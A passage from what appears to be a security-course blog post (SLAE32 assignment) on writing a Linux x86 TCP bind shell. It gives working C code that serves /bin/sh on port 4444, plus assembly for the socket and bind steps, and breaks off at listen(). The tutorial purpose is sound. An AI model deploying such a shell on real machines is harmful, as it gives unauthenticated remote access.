{"id":274,"date":"2022-05-15T20:52:19","date_gmt":"2022-05-15T20:52:19","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=274"},"modified":"2023-10-06T13:49:55","modified_gmt":"2023-10-06T13:49:55","slug":"slae32-assignment-1-linux-x86-tcp-bind-shell","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-1-linux-x86-tcp-bind-shell\/","title":{"rendered":"SLAE32 Assignment #1: Linux x86 TCP Bind Shell"},"content":{"rendered":"\n<p>In this blog post, we will be covering the process behind writing and analysing an x86 TCP bind shell for Linux in assembly.<\/p>\n\n\n\n<p>This post will be the first in a series of posts created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>The code for the TCP bind shell will consist of the following components:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Linux x86 TCP bind shell shellcode, written in Assembly.<\/li>\n\n\n\n<li>Shellcode skeleton code, written in C.<\/li>\n\n\n\n<li>Wrapper script for customising the listener port, written in Python.<\/li>\n<\/ul>\n\n\n\n<p>We will begin by analysing a simple example of a Linux x86 TCP bind shell written in C, from the following <a href=\"https:\/\/azeria-labs.com\/tcp-bind-shell-in-assembly-arm-32-bit\/\">blog post<\/a>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;stdio.h&gt;\n#include &lt;unistd.h&gt;      \/\/ dup2(), execve() and close() prototypes\n#include &lt;sys\/types.h&gt;\n#include &lt;sys\/socket.h&gt;\n#include &lt;netinet\/in.h&gt;\n\nint host_sockid;    \/\/ socket file descriptor\nint client_sockid;  \/\/ client file descriptor\n\nstruct sockaddr_in hostaddr;  \/\/ server aka listen address\n\nint main()\n{\n    \/\/ Create new TCP socket\n    host_sockid = socket(PF_INET, SOCK_STREAM, 0);\n\n    \/\/ Initialize sockaddr struct to bind socket using it\n    hostaddr.sin_family = AF_INET;                  \/\/ server socket type address family = internet protocol address\n    hostaddr.sin_port = htons(4444);                \/\/ server port, converted to network byte order\n    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   \/\/ listen to any address, converted to network byte order\n\n    \/\/ Bind socket to IP\/Port in sockaddr struct\n    bind(host_sockid, (struct sockaddr*) &amp;hostaddr, sizeof(hostaddr));\n\n    \/\/ Listen for incoming connections\n    listen(host_sockid, 2);\n\n    \/\/ Accept incoming connection\n    client_sockid = accept(host_sockid, NULL, NULL);\n\n    \/\/ Duplicate file descriptors for STDIN, STDOUT and STDERR\n    dup2(client_sockid, 0);\n    dup2(client_sockid, 1);\n    dup2(client_sockid, 2);\n\n    \/\/ Execute \/bin\/sh\n    execve(&quot;\/bin\/sh&quot;, NULL, NULL);\n    close(host_sockid);\n\n    return 0;\n}\n<\/pre><\/div>\n\n\n<p>We compile the code with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack example.c -o example\n<\/pre><\/div>\n\n\n<p>To make sure the code does what we expect, we briefly run it and connect to our local machine, on port 
4444:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220421122638-e1650551330573.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We connect to the port and note that we are able to perform typical \/bin\/sh commands.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">TCP bind shell syscalls<\/h2>\n\n\n\n<p>Analysing the C code, we identify four main syscalls that are performed to initiate a TCP bind shell. The syscalls are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>socket()<\/li>\n\n\n\n<li>bind()<\/li>\n\n\n\n<li>listen()<\/li>\n\n\n\n<li>accept()<\/li>\n\n\n\n<li>dup2()<\/li>\n\n\n\n<li>execve()<\/li>\n<\/ul>\n\n\n\n<p>We will cover each of these syscalls by studying their arguments and calling conventions, beginning with an analysis of the call to <strong>socket()<\/strong> in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Creating a socket<\/h3>\n\n\n\n<p>The <strong>socket()<\/strong> call is used to create an endpoint for communication. 
A successful call to <strong>socket()<\/strong> returns a file descriptor which refers to the created socket endpoint.<\/p>\n\n\n\n<p>According to the system call reference file stored in 32-bit Linux at \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.sh, the syscall number for socketcall is 102.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419122207.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>If we look at the man page for socketcall, we note that the syscall takes two parameters and has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nint socketcall(int call, unsigned long *args);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>First, we look at the call parameter. 
The implementation of sockets in linux can be found in the <strong>\/usr\/include\/linux\/net.h<\/strong> header file.<\/p>\n\n\n\n<p>Within this file, we find that to call the <strong>socket<\/strong> function, the call argument must have a value of 1.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124414.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To understand further how a socket is defined, we can refer to its <strong>man<\/strong> page:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419123827-e1650552412723.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>According to the above manpage entry, the socket function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>socket()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">domain<\/h4>\n\n\n\n<p>The <strong>domain<\/strong> argument denotes the protocol family which will be used for communication. In our case, as we are looking to establish a connection over the IPv4 protocol, this value will be set to <strong>AF_INET<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124040-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can find the corresponding numerical value of AF_INET in locally stored header files. 
For the version of 32-bit Kali Linux we are working with, the reference to AF_INET can be located in \/usr\/include\/i386-linux-gnu\/bits\/socket.h.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420193916-2.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">type<\/h4>\n\n\n\n<p>The next argument is the type of socket. As we are setting up a bind shell over TCP, we should use the SOCK_STREAM option, which is defined as being 'sequenced, reliable and connection-based' (i.e., suited to TCP).<\/p>\n\n\n\n<p>Based on its definition in \/usr\/include\/i386-linux-gnu\/bits\/socket_type.h, <strong>type<\/strong> should be set to <strong>1<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420194032-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">protocol<\/h4>\n\n\n\n<p>The final argument, <strong>protocol<\/strong>, can be set to its default value of <strong>0<\/strong>.<\/p>\n\n\n\n<p>Based on the description given in the manual page, normally only a single protocol supports a particular socket type. 
Therefore setting <strong>protocol<\/strong> to 0 sets the protocol to the default value based on SOCK_STREAM.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419131259-e1650553258796.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>socket()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socket<\/td><td>domain<\/td><td>The protocol family which will be used for communication<\/td><td>PF_INET<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>Specifies the communication semantics<\/td><td>SOCK_STREAM<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>Specifies a particular protocol to be used with the socket<\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to create a socket, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling socket()<\/h3>\n\n\n\n<p>By default, a syscall in 32-bit Linux will use the registers as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - Syscall Number<\/li>\n\n\n\n<li><strong>EBX<\/strong> - 1st Argument<\/li>\n\n\n\n<li><strong>ECX<\/strong> - 2nd Argument<\/li>\n\n\n\n<li><strong>EDX<\/strong> - 3rd Argument<\/li>\n\n\n\n<li><strong>ESI<\/strong> - 4th Argument<\/li>\n\n\n\n<li><strong>EDI<\/strong> - 5th Argument<\/li>\n<\/ul>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>, our register values will be set as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - 
system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call - socket (1)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - a pointer to the domain, type and protocol arguments<\/li>\n<\/ul>\n\n\n\n<p>As <strong>ECX<\/strong> must contain a pointer to our <strong>socket()<\/strong> arguments, we will first push them onto the stack in reverse order, and set ECX to point to the top of the stack where the arguments start:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>domain - PF_INET - 2<\/li>\n\n\n\n<li>type - SOCK_STREAM - 1<\/li>\n\n\n\n<li>protocol - default - 0<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>socket()<\/strong> will follow the layout below.<\/p>\n\n\n\n<p><strong>Note:<\/strong> decimal values have been converted into their hexadecimal equivalents, e.g. the syscall value 102 = 0x66.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>domain<\/td><td>0x2<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>socket()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_socket:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x1 for socket.\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; Clear ECX register and push values for protocol, type and domain to the stack\n        xor ecx, ecx\n        push ecx;       protocol - 0 
(0x00000000)\n        push 0x1;       type - 1 (0x1)\n        push 0x2;       domain - PF_INET (0x2)\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute socket() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<p>We can now link and compile the program using nasm and ld as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195642-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">socket() analysis<\/h3>\n\n\n\n<p>To understand the assembly code on a per-instruction basis and debug the compiled program, we can use <a href=\"https:\/\/www.sourceware.org\/gdb\/\">gdb<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195407.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>As we step through the program, it helps to print out the registers, stack and disassembled instructions to keep track of where we are in the program. 
We can do this by defining <em>hook-stop<\/em>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049000\n&gt;end\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420195812.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Now, every time we step through the program, the values of our specified registers are printed along with the top four stack values and the disassembled assembly instructions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200041.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can trace the program flow right up until the syscall to <strong>socket()<\/strong> is made, so that we ensure that the arguments are aligned correctly in the required registers and on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200152.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We reach the end of the function and find that EAX has been populated with the value of the socket descriptor, <strong>0x3<\/strong>. 
This indicates a successful call to <strong>socket()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200318.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Binding the socket<\/h3>\n\n\n\n<p>Now, we look at binding the socket to a chosen address, port and protocol family.<\/p>\n\n\n\n<p>The <strong>bind()<\/strong> function is used to assign a name to a given socket. When a socket is created, it initially has no address assigned to it. The <strong>bind()<\/strong> function is designed to assign an address to the socket which it does using its file descriptor.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419141129-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>bind()<\/strong> function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n\n<p>Before we get into the arguments for the bind function, we note that the call argument of <strong>socketcall()<\/strong> will now be set to the value for <strong>bind()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419145036-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We look at the \/usr\/include\/linux\/net.h file and note that <strong>bind<\/strong> has a call value of <strong>2<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200546.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>bind()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The <strong>sockfd<\/strong> parameter is the file descriptor of the socket. This value was returned following a successful call to the <strong>socket()<\/strong> function and, following the syscall, is stored in the EAX register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200318-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addr<\/h4>\n\n\n\n<p>The <strong>addr<\/strong> parameter is a pointer to the desired <strong>family<\/strong>, <strong>port<\/strong> and <strong>address<\/strong> properties of our socket.<\/p>\n\n\n\n<p>The structure of <strong>addr<\/strong> is loosely defined in the <strong>bind()<\/strong> manual entry.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419144159.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Referring to the C example source code, we note that the <strong>sockaddr<\/strong> structure is referenced by the <em>hostaddr<\/em> value.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/\/ Initialize sockaddr struct to bind socket using it \n    hostaddr.sin_family = AF_INET;                  \/\/ server socket type address family = internet protocol address\n    hostaddr.sin_port = htons(4444); 
               \/\/ server port, converted to network byte order\n    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   \/\/ listen to any address, converted to network byte order\n\n    \/\/ Bind socket to IP\/Port in sockaddr struct\n    bind(host_sockid, (struct sockaddr*) &amp;hostaddr, sizeof(hostaddr));\n<\/pre><\/div>\n\n\n<p>Based on the C source code, the sockaddr_in structure has three properties:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sin_family - Address family<\/li>\n\n\n\n<li>sin_port - TCP port<\/li>\n\n\n\n<li>sin_addr - IPv4 address<\/li>\n<\/ul>\n\n\n\n<p>For the purpose of initially simplifying our shellcode, we will set the <strong>port<\/strong> value to <strong>4444<\/strong>, with the address set to listen across all interfaces as denoted by <strong>INADDR_ANY<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addrlen<\/h4>\n\n\n\n<p>The <strong>addrlen<\/strong> value specifies the size of the address structure pointed to by <strong>addr<\/strong> in bytes. 
This will be 16 (0x10).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>bind()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Syscall arguments<\/td><td>-<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Socket address family, host IP address and port<\/td><td>&amp;hostaddr<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Size in bytes of addr<\/td><td>sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Additionally, the values pointed to by addr (sockaddr_in) are as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Struct<\/th><th>Argument<\/th><th>Man Reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>sockaddr_in<\/td><td>sin_family<\/td><td>Address family<\/td><td>0x2<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_port<\/td><td>TCP port to listen on in network byte order<\/td><td>0x5c11<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_addr<\/td><td>Host IP address in network byte order<\/td><td>0x00000000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to bind the socket, we can implement it in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling bind()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - bind 
(2)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - bind arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the elements of the sockaddr_in structure to the stack in reverse order, starting with sin_addr.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - Stored in EAX after call to <strong>socket()<\/strong>. We will save this value by moving it to the EDX register.<\/li>\n\n\n\n<li>addr - We will store this value in the ESI register.\n<ul class=\"wp-block-list\">\n<li>sin_family - AF_INET (2)<\/li>\n\n\n\n<li>sin_port - 4444 (0x5c11)<\/li>\n\n\n\n<li>sin_addr - INADDR_ANY (0x00000000)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>addrlen = 16 (0x10)<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>bind()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for bind<\/td><td>0x2<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Pointer to sockaddr_in structure<\/td><td>2, 0x5c11, NULL<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x10<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>bind()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_bind:\n\n        ; Clear and set EDX to socket file descriptor returned by socket()\n        xor edx, edx\n        mov edx, eax\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        xor eax, eax\n        mov 
al, 0x66\n\n        ; EBX's upper bytes are still zero from _socket, so only bl needs setting to 0x2 for bind()\n        mov bl, 0x2\n\n        ; Push sockaddr arguments for call to bind()\n        xor ecx, ecx\n        push ecx;               sin_addr - INADDR_ANY (0x00000000)\n        push word 0x5c11;       sin_port - 4444 (0x5c11)\n        push word 0x2;          sin_family - AF_INET (2)\n\n        ; Save pointer to sockaddr to ESI register\n        mov esi, esp\n\n        push 0x10;              addrlen - 16 (0x10)\n        push esi;               addr\n        push edx;               sockfd\n\n        ; Set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute bind() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">bind() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>bind()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202007.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We once again define hook-stop for the scope of the <strong>bind()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049013\n&gt;end\n<\/pre><\/div>\n\n\n<p>As we step through, we note that the instructions save the socket file descriptor to <strong>EDX<\/strong> as intended:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" 
alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The syscall is set up for the call to <strong>bind()<\/strong>, having moved <strong>0x2<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202420.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The values for the listening address, port and protocol family are pushed to the stack:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202646.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the addr values as per the function arguments for <strong>bind()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202817.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the syscall is made, the value <strong>0x0 <\/strong>is moved into <strong>EAX<\/strong>, indicating that the call was successful.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202956.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we look at the <strong>listen<\/strong> and <strong>accept<\/strong> syscalls.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Listening for connections<\/h3>\n\n\n\n<p>Now, we look at the call to the <strong>listen()<\/strong> function, which is used to listen for connections on the created socket.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
